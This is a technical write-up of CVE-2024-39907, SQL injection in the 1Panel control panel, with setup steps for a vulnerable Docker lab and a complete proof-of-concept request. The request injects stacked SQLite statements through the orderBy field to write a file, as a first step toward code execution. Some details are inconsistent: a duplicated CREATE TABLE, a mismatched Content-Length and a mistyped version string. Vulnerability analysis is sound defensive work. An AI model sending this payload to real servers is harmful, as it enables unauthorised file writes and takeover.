CVE-2024-39907: In-Depth Analysis of SQL Injection Vulnerability in 1Panel Control Panel

CVE-2024-39907 is a critical security vulnerability affecting the 1Panel server management control panel, involving multiple SQL injection points that could lead to remote code execution (RCE). Below is a detailed technical analysis of this vulnerability.

Vulnerability Overview

CVE-2024-39907 is a collection of multiple SQL injection vulnerabilities present in the 1Panel control panel. These vulnerabilities exist across several interfaces of 1Panel, where insufficient filtering could allow attackers to achieve arbitrary file writes and ultimately remote code execution (RCE)12.

1Panel is a web-based Linux server management control panel that provides a graphical interface for server administration. This vulnerability affects 1Panel v1.10.9-lts and earlier versions, and has been patched in v1.10.12-tls2.

Reference links:

• [nuclei-templates/http/cves/2024/CVE-2024-39907.yaml at main · projectdiscovery/nuclei-templates](https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-39907.yaml)
• https://hub.docker.com/r/moelin/1panel

Vulnerability Environment

Execute the following command to start a vulnerable instance of 1Panel v1.10.10-lts:

docker compose up -d

• Default port: 10086
• Default username: 1panel
• Default password: 1panel_password
• Default entrance: entrance

Then access http://your-ip:10086/entrance to see the login page and log in using the default credentials.

Vulnerability Reproduction

The vulnerability primarily exists in the API interfaces of 1Panel, particularly the /api/v1/hosts/command/search endpoint. Attackers can trigger SQL injection by carefully crafting request parameters2.

A typical proof-of-concept (PoC) request is as follows:

POST /api/v1/hosts/command/search HTTP/1.1
Host: 192.168.8.128:8877
Accept-Language: zh
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Referer: http://192.168.8.128:8877/aaa
Accept-Encoding: gzip, deflate
Cookie: psession=you-session
Connection: close
Content-Length: 83

{
  "page":1,
  "pageSize":10,
  "groupID":0,
  "orderBy":"3;ATTACH DATABASE '/tmp/randstr.txt' AS test;create TABLE test.exp (data text);create TABLE test.exp (data text);drop table test.exp;",
  "order":"ascending",
  "name":"a"
}

This attempts to create a database file to confirm whether the injection is successful.

Limitations and Considerations

1. Valid session required: As shown by the psession=you-session cookie, the attacker must first obtain valid authentication credentials.
2. SQLite-specific syntax: This PoC uses SQLite-specific commands, indicating that the 1Panel backend uses SQLite database.